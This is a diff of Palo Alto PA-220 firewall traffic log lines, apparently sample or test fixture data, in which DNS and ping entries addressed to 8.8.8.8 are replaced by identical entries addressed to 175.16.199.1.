-Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.194.41,192.168.1.63,35.186.194.41,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.124.9,192.168.1.63,35.201.124.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.131.237,192.168.1.63,100.24.131.237,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.190.88.148,192.168.1.63,35.190.88.148,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.243.83,192.168.1.63,35.186.243.83,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.165.74,192.168.1.63,100.24.165.74,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.94.140,192.168.1.63,35.201.94.140,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,66.28.0.45,192.168.1.63,66.28.0.45,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
